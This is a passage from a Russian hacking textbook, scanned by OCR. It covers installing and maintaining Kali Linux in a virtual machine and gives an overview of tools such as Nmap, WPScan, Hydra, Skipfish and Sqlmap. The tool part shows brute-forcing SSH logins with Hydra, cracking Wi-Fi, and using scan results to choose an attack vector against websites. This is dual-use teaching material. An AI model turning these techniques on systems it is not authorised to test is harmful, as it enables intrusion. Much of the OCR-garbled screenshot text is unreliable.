	Rati Linux 64-Bit (Irotalier)	Torrent	2020.4	4.10	50091207534882255422500253000754279652864332204772757505887902	Evasion Techniques and Breaching Defenses
	Kall Linux 64-8it (Live)	Torrent	2020,4	3.16	&094abs096499517307386a4999s69516746366869842a678957	(PEN-300) Have your OSCP? Take your pentesting skills to the rest level in Evation Techniques and Breaching Defenses.
	Kali Linuc 64-Bit (NetInstaller)	Torrent	2020.4	4718	10093505591029119459896-74354866-276678566-567153996243455479	
WY 12 May		1		3,65	19aa2331-c285+19n2+891c145723a8don78a40+c540877n77e57651c7n733337fd	

Рис. 6.1. Выбор образа

После загрузки образа запусти VMWare Workstation, выбери File, New Virtual Machine. В появившемся окне дважды нажми Next, пока не увидишь выбор операционной системы. Kali Linux в списке не будет, нужно выбрать 64-битную Ubuntu (рис. 6.2). Введи название виртуальной машины и выбери ее расположение. На выбранном диске должно быть достаточно свободного места (рис. 6.3).

			Reference.	1212121	1
Guest operating system					
O Microsoft Windows					
() Linux					
O Novell NetWare					
Osolaris					
OVMware ES <u>X</u>					
Ogther					
Version	1				
Ubuntu 64-bit	1.1.1.1.1.1		45.000		2
Sector and the sector of the			1. 1.	10000	
				1.76.24	
		17. 24 M			

Рис. 6.2. Выбор типа операционной системы

New Viltual Maci	hine Wizard	×
Name the Virt What name	ual Machine e would you like to use for this virtual machine?	
Virtual machine n	ame:	
Kali		
Location:		
E:\Kall	Carlos de Properte Carlos de	Browse
Statute and states	and the second second second second	

Рис. 6.3. Название виртуальной машины и ее расположение

Следующий шаг – выбор размера виртуального диска. Слишком большой размер устанавливать не нужно – он просто не пригодится. 20 Гб будет вполне достаточно. После этого нужно нажать кнопку **Customize Hardware** (рис. 6.5). По умолчанию виртуальная машина создается с весьма скромными параметрами – 1 процессор и 1 Гб ОЗУ. Этого будет маловато.

New Virtual Machine Wizar	d ×
Specify Disk Capacity	
How large do you wan	it this disk to be?
The virtual machine's hard computer's physical disk. Th you add applications, files, a	disk is stored as one or more files on the host nese file(s) start small and become larger as and data to your virtual machine.
Maximum disk gize (GB):	20.0 🚖
Recommended size for Ubu	ntu 64-bit: 20 GB
O Store virtual disk as a si	ngle file
Split virtual disk into mu	ltiple files
Splitting the disk makes computer but may reduc	It easier to move the virtual machine to another be performance with very large disks.
	The state of the state of the state
philosoph	
Help	< Back Next > Cancel

Рис. 6.4. Размер виртуального диска

he virtual machine	will be created with the following settings:
Name:	Kali
Location:	E:\Kali
Version:	Workstation 12.x
Operating System:	Ubuntu 64-bit
Hard Disk:	20 GB, Split
Memory:	1024 MB
Network Adapter:	NAT
Other Devices:	CD/DVD, USB Controller, Printer, Sound Card
Customize Hardw	are

Рис. 6.5. Нажми кнопку "Customize Hardware"

В появившемся окне (рис. 6.6):

- 1. В разделе Memory установи 2 Гб.
- 2. В разделе **Processors** установи столько ядер (cores), сколько есть у тебя в компьютере. Например, у процессора CORE i5 четыре ядра. Минимум нужны хотя бы 2 ядра. Чем больше ядер ты установишь, тем быстрее будут происходить процессы взлома. Но помни, что устанавливать количество ядер больше, чем есть у физического компьютера, попросту нет смысла.
- 3. В разделе New CD/DVD нужно установить путь к загруженному ISOобразу, как показано на рис. 6.6.

lardware	Constant and the second of	×
Device Mit Memory Processors New CD/DVD ( Substantial Source Cord Printer Display	Summary 2 GB 2 Auto detect NAT Present Auto detect Present Auto detect	Dever status Dever status Dever status Dever status Connected one Outro gines dever Media status Outro gines (50 gines file)
		Biometeride/ad-Inac-2004- v
	€Add	Bernove .
		Close Help

Рис. 6.6. Окно Hardware

Нажми кнопку Close, далее нажми кнопку Finish. Все готово для запуска. Нажми зеленую кнопку на панели инструментов (с изображением кнопки Play). При запуске инсталлятор отобразит меню (рис. 6.7). Выбери первый пункт – графическую установку, при желании можно выбрать и обычную (Install) – установка будет произведена в текстовом режиме. Есть даже поддержка русского языка (рис. 6.8). Выбери русский язык, если тебе так будет проще и нажми три раза кнопку Продолжить – языковые опции и опции раскладки клавиатуры в этом дистрибутиве не главное.



Рис. 6.7. Меню загрузчика

elect a language	
Choose the language ( language for the insta <i>Language:</i>	to be used for the installation process. The selected language will also be the default illed system.
Norwegian Nynorsk	- Norsk nynorsk
Persian	·
Polish	- Polski
Portuguese	- Português
Portuguese (Brazil)	- Português do Brasil
Punjabi (Gurmukhi)	<ul> <li>น์สาขี</li> </ul>
Romanian	- Română
Russian	- Русский
Serbian (Cyrillic)	- Српски
Sinhala	- සංගල
Slovak	- Slovenčina
Slovenian	Slovenščina
Spanish	- Español
Swedish	- Svenska
Tagalog	- Tagalog

Рис. 6.8. Выбор языка интерфейса

Далее нужно будет ввести имя компьютера и имя домена. В качестве имени компьютера можно ввести kali, а в качестве доменного имени – example.org. По большому счету, на данном этапе все равно, какое доменное имя будет у твоей машины.

Contraction of the second second second	пользовате	лей и паролей			
Выберите имя пользовател учётной записи может быти строчной латинской буквы, цифр. Имя вашей учётной записи:	ія (учётную з ь использова , за которой і	чапись), под к но ваше реал может следов	оторын вы буде ьное ния. Учётн ать любое коли	те навестны в систе ая запись должна и чество строчных ла	ме. В качестве ачинаться со тинских букв или
user	a like of				
	-			S. Salar	
		1.			
			Start Courses		

Рис. 6.9. Создание обычного пользователя

астрояка учетн	ых записей пользователей и паролей	
Короший пароль меняться. Введите пароль д	представляет на себя смесь букв, ци ля нового пользователя:	фр и знаков препинания, и должен периодически
🗍 Показывать в	водимый пароль	
Проверка прави	пьности ввода осуществляется путём	повторного ввода пароля и сравнения результатов.
рведите пароль е	we pas:	
оссоссоссоссоссоссоссоссоссоссоссоссосс	ще раз:	
езеерите пароль е Споказывать в	це раз: Тодимый пароль	
ССССССССССССССССССССССССССССССССССССС	це раз водиный пароль]	
рассите парола е есстрение Показывать в	церая: водимый пароль]	
рандите пароль е	иа раз:	
ранците пароль с	ия раз: водяный пароль	
ранците пароль с	ия раз: водиный пароль	
	иа раз	

Рис. 6.10. Задание пароля пользователя

Затем установщик попытается создать пользователя, от имени которого ты будешь выполнять ежедневные задачи (если будет), введи user или любое другое имя (рис. 6.9). После создания пользователя нужно задать его пароль (рис. 6.10).



Рис. 6.11. Разметка диска

the second		
зыбрано для разметки: 555/33 (0,0,0) (sda) - VMware, VMware Virtual S: 21.5 Циск может быть размечен по одной из следующих совиа разметки:	GB схем. Если вы не знаете, что вы	брать выбирайте
Все файлы в одном разделе (рекомендуется нович	(ам)	
Отдельный раздел для /home		
Отдельные разделы для /home, /var и /tmp		
		1
	a gran and a star of the	
	1. S. Sugar M	Ting is carded

Рис. 6.12. Как хранить файлы...

Нажми **Продолжить**, чтобы пропустить выбор часового пояса (как правило, он определяется верно, но при желании можно уточнить выбор) и перейти к разметке диска.

Поскольку мы устанавливаем Kali в виртуальную машину, нет смысла использовать ручную разметку. Используй вариант **Авто** для использования всего диска.

При желании можно использовать шифрование и LVM (рис. 6.11), но Kali – это инструмент, а не хранилище для личных данных. Даже не знаю, стоит ли шифровать ее файловую систему. На всякий случай такая возможность есть.

азметка дис	ков	1.20					
Перед вами с настройки (т раздел, или у	писок настроенн нп файловой сих стройство, чтоб	ных разделов темы, точку в ы создать на г	и их точек мон юнтирования нём новую таб	нтирования. Вы и так далее), сы лицу разделов.	берите раздел, чт зободное место, чт	обы изменить его тобы создать новы	й
Автоматич	еская размети	a	1. S. S. S. W.		201. State	a star and a star	
Настройка	программного	RAID					
Настройка	менеджера л	огических то	MOB (LVM)				
Настроити	шифрование	для томов					
Настроити	тома iSCSI						
≠ SCSI33 (0,	0,0) (sda) - 21.	5 GB VMware,	VMware Virt	ual S			
> 1	1 первичн.	20.4 GB	f ext4	1			
> 1	5 логичес.	1.0 GB	f подк	подк		1.1.1.1.1.1.1	
				1			
Отменить	изменения раз	делов	1.10				1211
Закончити	разметку и за	писать изме	нения на дис		S. S. Margaret Marga	Street Stores	203

Рис. 6.13. Разметка готова, нажми кнопку "Продолжить"

В следующем окне выбери жесткий диск – он будет единственным – и нажми **Продолжить**. Инсталлятор Kali создан на базе инсталлятора Debian, поэтому задает столько лишних вопросов. На рис. 6.12 можно смело нажать **Продолжить**.

Наконец-то, нажми **Продолжить** для сохранения разметки диска (рис. 6.13). На следующем этапе выбери **Да** и опять нажми кнопку **Продолжить**.

Разметка дисков Если вы продолжите, то изменения, перечисленные ниже, будут записаны на диски. Или же вы можете сделать все изменения вручную. На этих устройствах изменены таблицы разделов: SCSI33 (0,0,0) (sda) Следующие разделы будут отформатированы: раздел #1 на устройстве SCSI33 (0,0,0) (sda) как ext4 раздел #5 на устройстве SCSI33 (0,0,0) (sda) как подк Записать изменения на диск? -O Her 🖲 Да Снимок экрана Продолжить

Рис. 6.14. Выбери "Да"

	BY OPPENSIVE SECURITY	A STATE OF A
ювка базовой системы		
	Установка базовой системы	
Установка основных (соге	е) пакетов	1997年1月1日日日 1
riadore a cardioada	and the state of the second state and	s en en tels service o sins
		diana in litera
	a the second states and the states of the second	and the state of the
		al a water A special

Рис. 6.15. Система в процессе установки

После этого начнется установка системы. После установки базовой системы тебе будет предложено выбрать устанавливаемое ПО. На данный момент можно смело оставить все по умолчанию (рис. 6.16). Устанавливать "тяжелые" GNOME и KDE не нужно, вполне хватит легкой среды Xfce. После очередного нажатия на кнопку, название которой даже не хочется произносить, нужно немного подождать, пока установится выбранное ПО.

ыбор программного обеспечения		
t the moment, only the core of the system is installed. The default sel ith its standard desktop environment and the default tools.	lections below will install Kali Linu	IX
ou can customize it by choosing a different desktop environment or a choose software to install:	different collection of tools.	
Desktop environment [selecting this item has no effect]		-
🖞 Xfce (Kali's default desktop environment)		
] GNOME		
] KDE Plasma		
Collection of tools [selecting this item has no effect]		
🖞 top10 the 10 most popular tools		
1 default recommended tools (available in the live system)	and the second second	
large default selection plus additional tools		

Рис. 6.16. Выбор пакетов при установке

Как только пакеты будут скопированы, инсталлятор спросит вас, нужно ли установить загрузчика GRUB. Конечно, ведь без него система не сможет загружаться (рис. 6.17)! Также нужно указать, куда именно установить загрузчика – на единственное устройство (рис. 6.18).



Рис. 6.17. Нужно ли установить загрузчик?



Рис. 6.18. Куда именно установить загрузчик

В следующем окне нажми **Продолжить** для перезагрузки системы. Система загрузится, и появится возможность войти в нее – используй имя пользователя и пароль, заданные при ее установке. На рис. 6.20 показан рабочий стол Kali Linux.



Рис. 6.19. Вход в систему



Рис. 6.20. Рабочий стол Kali Linux

## 6.3. Обслуживание системы

### 6.3.1. Обслуживание источников пакетов

Оригинальные источники приложений (репозитории) являются главным залогом здоровья вашей Kali Linux. Предупреждение о том, что изменение/ добавление новых репозиториев, как правило, убивает систему, есть на официальном сайте. Многочисленный опыт свидетельствует, что огромное количество проблем вызвано ошибками в источниках приложений. Если не работают стандартные инструкции по Kali Linux, которые работают у большинства других пользователей, то на 99% причиной этого являются измененные репозитории.

Самое главное, чтобы в файле /etc/apt/sources.list. была строка:

deb https://http.kali.org/kali kali-rolling main non-free contrib

и не было сторонних источников приложений.

Можно проверить, в порядке ли твои репозитории, следующей командой, она так и напишет — все в порядке или есть проблемы:

```
if cat /etc/apt/sources.list | grep -E "deb https://http.
kali.org/kali kali-rolling main contrib non-free" || cat /
etc/apt/sources.list | grep -E "deb https://http.kali.
org/kali kali-rolling main non-free contrib"; then echo
-e "\n\n\033[0;32mРепозиторий в порядке"; else echo -e
"\n\n\033[0;31mПроблема с репозиторием"; fi
```

Если есть проблемы, то все исправить можно другой командой:

sudo echo -e "deb https://http.kali.org/kali kali-rolling main non-free contrib" > /etc/apt/sources.list

Эта команда полностью затрет файл /etc/apt/sources.list и добавит туда одну строчку.

После обновления репозиториев набери эту команду — она обновит данные о доступных в репозиториях пакетах:

Если ты ничего не изменял после установки дистрибутива, просто набери команду sudo apt-get update для обновления списка пакетов.

## 6.3.2. Ошибка "The disk contains an unclean file system (0, 0). Metadata kept in Windows cache, refused to mount"

При попытке смонтировать Windows-раздел ты можешь получить вышеприведенное сообщение об ошибке. Первым делом нужно определить имя проблемного диска, для этого введите команду:

fdisk -1

Определи имя раздела. Как правило, диск C: – это первый раздел на диске (хотя могут быть исключения) и он называется /dev/sda1. Передай это имя команде ntfsfix:

После этого можешь повторить попытку монтирования файловой системы командой:



#### 6.3.3. Регулярная очистка системы

Время от времени рекомендуется выполнять команды по удалению пакетов, которые были установлены автоматически (так как были зависимостями других программ), но теперь больше не нужны.

Для этого применяется команда:

sudo apt-get autoremove -y

Ее использование безопасно и не должно приводить к проблемам.

При каждом обновлении программ файлы пакетов скачиваются в кэш. После обновления скачанные файлы (можно назвать их установочными) не удаляются, и постепенно кэш разрастается до больших размеров. Это сделано намеренно с той идеей, что если после очередного обновления было обнаружено, что новый пакет имеет проблемы, а старая версия уже недоступна в онлайн-репозитории, то можно откатиться до старой версии, установив ее из файла, сохраненного в кэше.

Для роллинг-дистрибутивов кэш разрастается очень быстро, и если ты недостаточно квалифицирован, чтобы откатиться до старой версии, то для тебя эти сотни мегабайт или даже несколько гигабайт – это зря потраченное место на жестком диске. Поэтому время от времени можно выполнять команды:

```
sudo apt-get autoclean -y
sudo apt-get clean -y
```

Команда clean удаляет скачанные файлы архивов. Она очищает локальный репозиторий от полученных файлов пакетов. Она удаляет все, кроме lock файла из /var/cache/apt/archives/ и /var/cache/apt/archives/partial/.

Команда **autoclean** удаляет старые скачанные файлы архивов. Как и *clean*, *autoclean* вычищает из локального репозитория скачанные файлы пакетов. Разница только в том, что она удаляет только файлы пакетов, которые не могут быть больше загружены и в значительной степени бесполезны.

Это позволяет удерживать кэш в течение долгого периода от его слишком большого разрастания.

Следующая команда не связана непосредственно с очисткой, но помогает поддержать здоровье системы.

sudo apt-get install -f -y

Опция -f, --fix-broken исправляет, пытается привести в норму систему с нарушенными зависимостями. Эта опция, когда используется с install/remove, может пропустить какие-либо пакеты, чтобы позволить АРТ найти вероятное решение. Если пакеты указаны, это должно полностью исправить проблему. Эта опция иногда необходима при запуске АРТ в первый раз; АРТ сама по себе не позволяет существовать в системе пакетам со сломанными зависимостями. Вполне возможно, что структура зависимостей системы может быть настолько нарушена, что потребуется ручное вмешательство (что обычно означает использование dpkg --remove для устранения некоторых пакетов-нарушителей). Использование этой опции совместно с -m в некоторых ситуациях может вызвать ошибку.

#### 6.3.4. Задание пароля root. Вход как root

В последних версиях Kali, судя по всему, разработчики решили отойти от концепции одного пользователя. Во всяком случае, пароль пользователя *root* не запрашивается даже при установке системы. Сейчас мы это исправим. Открой терминал и введи команды:

Первая команда запускает **bash** с полномочиями *root*. Введи свой пароль, указанный при установке. Кстати, после ввода **sudo bash** ты получаешь максимальные права и *root*, по сути, тебе не нужен. Но все же мы изменим его пароль второй командой, чтобы была возможность входа как *root* сразу в систему. Затем выйди из системы и в окне ввода имени пользователя и пароля введи имя root и установленный пароль. После этого нажми кнопку входа из системы (последняя кнопка на панели инструментов в верхнем правом углу), появится окно, в котором, помимо всяких кнопок, сообщается имя пользователя. Если ты видишь root (см. рис. 6.22), то ты все сделал правильно.



Рис. 6.21. Измекение пароля гоот



Рис. 6.22. Выполнен вход как гоот

## 6.4. Обзор лучших инструментов Kali Linux

Как уже было отмечено, в состав Kali Linux входит более 600 инструментов для взлома и анализа безопасности. Рассмотрение всех этих инструментов выходит за рамки этой книги, поскольку тогда бы пришлось написать отдельную книгу по Kali Linux.

В этой главе мы рассмотрим двадцать лучших инструментов. Разумеется, ты заинтересовался, поэтому приводим ссылку на документацию по всем инструментам:

https://tools.kali.org/tools-listing

#### 6.4.1. WPScan

WordPress – это одна из лучших CMS с открытым исходным кодом, она бесплатна, для нее существует множество расширение, что сделало ее очень популярной.

На базе WordPress делают самые разнообразные сайты – сайты-визитки, блоги и даже интернет-магазины.

Примечание. Если ты совсем новичок, то CMS (Content Management System) – система управления контентом. Именно она позволяет пользователю (администратору ресурса) формировать содержимое страниц сайта (это делается в админке), а затем выводит это содержимое в заданном дизайне (теме оформления).

Инструмент WPScan позволяет проверить WordPress на наличие уязвимостей. Кроме того, он также предоставляет подробную информацию об активных плагинах. Хорошо защищенный блог не предоставит много информации, но все же можно попытаться.



Рис. 6.23. Справка по инструменту

В простейшем случае использование инструмента выглядит так:

	A CONTRACTOR AND A CONTRACTOR		M. E. LEWIS HILE .	
wpscan	url	адрес	сайта	No. Carlos

Сразу ты блог не взломаешь, но ты получишь информацию о его уязвимостях, которые ты можешь использовать. Также будет доступна всякого рода системная информация вроде версии PHP, см. рис. 6.24.

	10:09 NIT (PM) D	 G
realized and the second se		
Файл Действия Правка Вид Справка		
W/PEGEE		
WordPress Security Scamer by the W95cam Team. Version 3.8.10		
alumskan,, aethicalhaskar, aenan tr, afiaefart		
Updating the Databade Update completed.		
URL: http://wec.nityl.com.ur/ [91.201.4.49] Effective URL: http://securityl.com.ut/bi/ Startef Wrote: 21:5508 200		
Interesting Finding(s):		
<ul> <li>skuders</li> <li>statesting Betriess</li> <li>Server gin</li> <li>KNaerte der WP/S.1.20</li> <li>opgreis: Libit</li> <li>opgreis: Libit</li> <li>opgreis: Libit</li> <li>opgreis: Libit</li> <li>opgreis: Libit</li> </ul>		
) mours.inf.informed.info.//severitit.com.eu/Pours.inf Propressing Detrem: //w-sever/ //w-sever/ Detremotive:severities.php Enout Ry: Whets Info (Aggressive Detection) Comfidence: Infor		
: VM. DF years to be enabled: http://secoligi.com/anter.abu / Social by Link Tri (Social Greecian) Contenent: NN		



#### 6.4.2. Nmap

Сетевой сканер **Nmap** был, есть и будет самым популярным сетевым сканером.

Он настолько популярен, что засветился в "Матрице" и некоторых других фильмах. Если хакеры что-то взламывают, то ... они просто запускают **птар**, который генерирует много всякого вывода.

На самом деле **птар** – очень важный инструмент предоставления информации об удаленном узле. На рис. 6.25 показаны сервисы, запущенные на удаленном узле.



Рис. 6.25. Запущенные на удаленном узле сервисы

Если нужен подробный отчет, тогда используй опции –*T4 –A –v* – это так называемое интенсивное сканирование (рис. 6.26), в результате которого предоставляется больше информации.

Например, сразу невооруженным взглядом стало понятно, что мы сканируем не физический комп, а VPS от Мастерхоста.



Рис. 6.26. Интенсивное сканирование

Посмотри на рис. 6.27. Из него становится понятно, что:

- на 22-ом порту "висит" SSH под управлением Ubuntu;
- на портах 80, 3128, 5555 работает веб-сервер Арасhe, на порту 5555 работает Git-репозитарий Багзиллы;
- на порту 8000 работает SimpleHTTPServer Питона.



Рис. 6.27. Результат сканирования

Как видишь, очень много информации стало доступно после сканирования. Например, ты и догадываться не мог об открытых портах 5555, 8000, 3128 и о том, что там что-то есть! Затем эти порты можно просканировать другими утилитами – очевидно, на них "висят" сайты. Нужно определить, какая CMS используется. Если там WordPress, можно попробовать просканировать его WPScan, если другая – Skipfish. Нужно постараться определить тип CMS и ее версию. Далее в сети нужно найти информацию об уязвимостях в той или иной CMS.

### 6.4.3. Lynis

Lynis – это мощный инструмент для аудита безопасности, тестирования соответствия и защиты системы.

Конечно, можно также использовать его для обнаружения уязвимостей и тестирования на проникновение. Он будет сканировать систему в соответствии с обнаруженными компонентами. Например, если он обнаружит Apache – он запустит связанные с Apache тесты для получения информации о его слабых местах.

По умолчанию этот инструмент не установлен. Для его установки нужно ввести команду:



Для запуска аудита удаленной системы введи команду:

lynis audit system remote IP-agpec

#### 6.4.4. Aircrack-ng

Aircrack-ng – это набор инструментов для оценки безопасности сети Wi-Fi.

Он не ограничивается только мониторингом и получением информации, но также включает возможность взлома сети (WEP, WPA 1 и WPA 2).

Если ты забыл пароль своей собственной сети Wi-Fi – можно попробовать использовать его для восстановления доступа. Он также включает в себя различные беспроводные атаки, с помощью которых хакер может нацели- и ваться / отслеживать сеть Wi-Fi для повышения ее безопасности.

Подробно данный инструмент будет описан в главе 10.

## 6.4.5. Hydra

Если тебе нужен интересный инструмент для взлома пары логин / пароль, **Hydra** будет одним из лучших предустановленных инструментов Kali Linux.

😤 💷 🖬 🗣 🔽 🖂 🗠 rootietait:	10/36/00 (PM) 🖸	. 0	A G-
- Tutl@tut			
Файл Действия Правка Вид Справка			
25h: command hot found; phone			
widra 99.1 (f) 2020 by van Hausor/THC & David Mariojak - Please do not use in military or secret service organizations s-binding, these ** space task and ethics anyway).			
Syntax: Nydra [[[-] LOGIN -L FILE] (-p PASSH-P FILE]) [-[-C FILE]) [-[-C FILE] [-T FILE] [-T TASKS] [-M FILE [-T TASKS]] > MIN-MAXIGMARSET] [-R TIME] [-ISOLVONG] [-M MCOULE_OPT] [SERVICE://SERVETIPORT][OPT]]			
<pre>cplions; -1 uCDL or 'L FILE login with LOGIN mame, or load several logins iron FILE p MASS or P FILE try password PASS, or load several hoxawords from FILE -C FILE coll separated to TOGINADAS' from time, instead of L/P aptimums M FILE ILL of servers to attack, one entry per line, 's' to specify port -1 PASS - pur ArXS: number of competts for parallel per trapet (detulits 18) -U server to collos seperitor for 1 module, sev -U output for information n more command line aptimums (COMPLIFE HELP) server to charget COSA, IS of JA2.108 of JA2.108 of JA2.108 of JA2.108 of JA2.108 of the service notices seperit adde of JA2 (this of the -A option) server to charget COSA, IS of JA2.108 of J</pre>			
Supported services: adapt30 asterisk cisco cisco-emable vs. firebird (fp[5] http[5]-beadjet[post] http[5]-get[post] ica imp[5] iff (dop2[5]) idap[]-[cradigings1]ed5][() ematached amogend mayi magi mig postorSubstere cractle sig i nu reals: exec fingin program for fps 97-108 sip and schlag] antip-hum and magn bickSt Subster, vin teampart celes[]			
Where is a tept to guess/crack valid login/passward pairs. Licensed under AGPL 42.4. The rewart version is always available at: https://githuic.com/unhauserick/the-http: Please dealt use is mailtary or exerct devate argumizations, or for illegal purposes. (This is a wish, and non-binding - most such people do not care about law and entits anyway - and tell therealyst they are one of the cod the cod			
Example: hydra -l user -P passist.txt ftp://192.168.0.1			
Puc. 6.29. Hydra			

Это реальная программа для взлома логина/цароля. Представим, что есть узел 111.11.11.22, на нем крутится SSH, как мы узнали из вывода **птар**. Попробуем его взломать:



Рис. 6.30. Гидра в действии. К сожалению, пароли не найдены...

Тебе нужно сформировать (или где-то найти) файлы logins.txt и pass.txt – в них Гидра будет искать имена пользователей и пароли, которые будет "скармливать" SSH-серверу, работающему по адресу 111.11.11.22.

## 6.4.6. Wireshark

Wireshark – самый популярный сетевой анализатор, который поставляется с Kali Linux. Его также можно отнести к категории лучших инструментов Kali Linux для анализа сети.

Он активно поддерживается, поэтому я определенно рекомендую попробовать его в работе.
# 6.4.7. Metasploit Framework

Metasploit Framework – наиболее часто используемая среда тестирования на проникновение.

Она предлагает две редакции – одна (с открытым исходным кодом), а вторая – профессиональная версия.

С помощью этого инструмента можно проверить уязвимости, протестировать известные эксплойты и выполнить полную оценку безопасности.

Конечно, бесплатная версия не будет иметь всех функций, поэтому, если сравнить эти две редакции, может, профессиональная версия как раз то, что тебе нужно. Подробно об этом инструменте мы поговорим в следующей главе.

# 6.4.8. Skipfish

Аналогично WPScan, но не только для WordPress.

Skipfish – это сканер веб-приложений, который даст вам представление практически о каждом типе веб-приложений.

Он быстрый и простой в использовании. Кроме того, его метод рекурсивного сканирования делает его еще лучше.

Для профессиональных оценок безопасности веб-приложений пригодится отчет, созданный Skipfish. Полученную от сканера информацию об уязвимостях ты можешь использовать для взлома систем.

Попробуем использовать инструмент на практике. Для запуска нужно передать, как минимум, две опции – результирующий каталог, куда будут помещены результаты сканирования, а также URL сайта. Сначала нужно указывать опцию, а затем название сайта, иначе программа не поймет последовательность опций:

skipfish -o /root/skipfish <Имя сайта>

Далее (рис. 6.31) программа отобразит памятку для пользователя:

- 1. Ты можешь прервать сканирование в любой момент, нажав Ctrl + C, частичный отчет будет записан в указанное тобою расположение.
- 2. Для просмотра списка просканированных URL нажми **Пробел** в любое время сканирования.

- 3. Просмотри количество запросов в секунду на главном экране. Если оно меньше 100, сканирование займет длительное время. На рис. 6.32 на данный момент 7.1 запроса в секунду. Это очень мало, сканирование займет много времени.
- 4. Новые версии сканера выходят каждый месяц, не забывай обновлять систему для их получения (можно обновлять не всю систему, а только пакет сканера).



Рис. 6.31. Памятка Skipfish

1 I I I I I I I I I I I I I I I I I I I	🖌 🖸 roct@kali: -	10:08 ДЛ (АМ) 🖸	
and set			_ 0 X
Файл Действия	Правка Вид Справка		
skipfish version 2			
Boss statistics:			
Scene Line MTF recodest Compression MTF realist MTF realist TCP fourts Extrements source Detected source Rems recoding	0:0510.028 2177 (7:17), 270.69 kB im. 914B kB out (10.7 5879) 1713 (8 in, 773Bk kB out (65.68 gain) 2 nd terrors, B orbite errors, Priteda, B drogs 50 tots (64.0 reg/comm) 6 failtres, J tagg/comm) 6 failtres, J tagg/comm 199 stippet		
Satabase statistic			
Plose : To program Bor of the in- Bor type, i Bor type, i Constant of the Otto inter- Signatures :	531 total, 14 dawn (3.999) 14 ponding, 15 Juli, 6 statcha, 5 dict 3 spatied 1 sfr, 167 dir, 2 file, 1 ginfo, 17 worm, 13 par, 18 val 27 inte, 5 warn, 14 Gw, 10 wellem, 0 kagh smact 23 words (337 mew), 10 extensions, 239 candidates 77 unta		

#### Рис. 6.32. Сканирование в процессе

Если ты сканируешь сайт легально и у тебя есть доступы к нему, подключись по *ssh* и посмотри нагрузку на сервер (команда **htop**). Если нагрузка высокая, это говорит о следующем:

- Возможно, следует прекратить тестирование и повторить его не в бизнесвремя. Иначе есть вероятность "положить" сайт, и обычные пользователи не смогут получить предоставляемые ним услуги (это особенно критично для интернет-магазинов).
- Это явный признак того, что ресурсов не хватает и их нужно добавить. Представь, что сканирование запустишь не ты, а кто-то другой. Если skipfish "положил" сайт, то нужно явно поднять ресурсы – количество процессоров и оперативную память.

	Sec.		1.121	19.52			1		1.			6 ( ) <del>-</del>	D	×
PID USER	PRIC	NE	VIRT	RES	SHR.	EII.	PUS	MEMX	TIME	Command			10,34513	633 <b>1</b>
7675 www-data	20	. 0	498M	1834	1401	S 1	2.5	0.5	11:51.70	php-fpm:	pool www		Ser Jack	11-2008
														. 8
13132 Nove Data														. 8
13190														- 8
7607	20							0.4						. 8
7655 when doild	20									php-tpm:				
13230	20													2-71
7593														
13060														
13026														. 8
13063														- 8
7664 00000000														<b>B</b>
13025	20									pop-tpm:				- B
7720														
10/3 4065 denic					1000					php-tpm:				. 8
1141					1000			a a	1048:16					270
4751					18536									1 - 41
4830	- 20								a:00.17					
4829	20				18536			74 9	A-00.13					
4753	20							24 9	A: A2 63					1-51
4634	20								0:04.81					1-61
4830	20								0:00.14					d- Fi
4787 104														1-F1
Filelp Fastur	Fase	arch	F4	enF51	ree Fe	Sol	TEV	F7NHG	e -FSNice	+F9Kill	Fieldit	DATA MARKANINE PAR	A POPAG	~

Рис. 6.33. Использование ресурсов во время сканирования

Нужно отметить, что skipfish работает довольно корректно по умолчанию (если иного не задано в опциях) и админ того сайта даже не заметит факт сканирования, поскольку нагрузка на сервер должна быть в пределах нормы.

Если тебе надоело ждать, в любой момент можно прервать сканирование сайта, нажав Ctrl + C. На рис. 6.34 показано, что сканирование как раз прервано пользователем.

После этого открой файловый менеджер и перейди в каталог с результатами (в нашем случае это /root/skipfish). Открой файл index.html, в нем и будет отчет о результатах сканирования. На рис. 6.35 показано, что Skipfish нашел 4 уязвимости, несмотря на то, что сканирование было прервано раньше. Раскрой узлы страницы и ознакомься с содержимым отчета – далее ты поймешь, какой вектор атаки выбрать для взлома сайта.



Рис. 6.34. Сканирование прервано пользователем

😤 🔄 🖃 💽 🔥 📑 👋 Skipfish - scannetul — morrièhair. Skipfish - scannetul — morrièhair.	rool@kall:	uri skipfish - Φa	λπουειώ 12.26 ΠΠ-(P	
skipfish	1	Scanner version: 1 Random seed: 0	2.100 Scan date 1x253e7;16f Total time: Problems	Two Dec 8 12:22 45 2020 2 for 19 min 19 sec 785 ms with free scart? Click here for analog
Crawl results - click to expand:			the second	
Cone 200 unget: 8000, anchest understand decrete the determine units a labor taxes + 1			1	
application/javascript (4)	i se di la	in and	Serve Contract	Harry Mary Mar
text/html (6)				
text/plain (3)	e ( 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1			Nor Section.
Issue type overview - click to expand:				
Query injection vector (i)     Shell injection vector (i)     Interesting server message (i0)			Harring and	

#### Рис. 6.35. Информация о 4 уязвимостях

# 6.4.9. Sqlmap

Данный инструмент позволяет автоматизировать процесс поиска SQLинъекций и позволяет хакеру захватить серверы баз данных.

**SQL-инъекция** (SQL Injection) – это тип атаки, при котором хакер изменяет логику SQL-запросов веб-приложения, что позволяет ему читать/изменять/ удалять значения в базе данных, а иногда – даже выполнять произвольный код на стороне сервера.

Далее мы рассмотрим самый популярный инструмент для поиска sqlmap.

На данный момент SQL-инъекция является наиболее опасным типом уязвимости из всех возможных. На протяжении последних 5 лет, лидирующую строчку "OWASP TOP-10" занимают именно SQL-инъекции.

Существует 5 основных причин возникновения этой уязвимости:

- 1. Недостаточный уровень или отсутствие валидации входных параметров, в особенности пользовательского ввода. Если ты проектируешь систему, то ты должен понимать, что любой входной параметр, поступающий извне, должен проходить тщательную валидацию, прежде чем будет передан в базу данных. Относитесь к каждому параметру так, как будто бы он содержит SQL-инъекцию. В некоторых случаях помогает проверка содержимого параметра. Если он содержит SQL-операторы вроде DELETE, SELECT, UPDATE, INSERT, TRUNCATE, CREATE, DROP – такой параметр не должен быть принят. Но такая проверка не всегда оправдана, например, если ты проектируешь блог, посвященный синтаксику SQL, то запросто такие операторы могут встречаться в статьях, которые пользователи будут добавлять в базу данных при их написании.
- 2. Необоснованный и слабозащищенный доступ к базам данных. В эту категорию входят такие факторы, как: большое количество администраторов и супер-пользователей (root), слабая система аутентификации, большое количество прав для второстепенных администраторов и т.д.
- 3. Архитектура. Использование устаревших технологий, отсутствие контрольных мер, пренебрежение методологией "моделирование угроз".

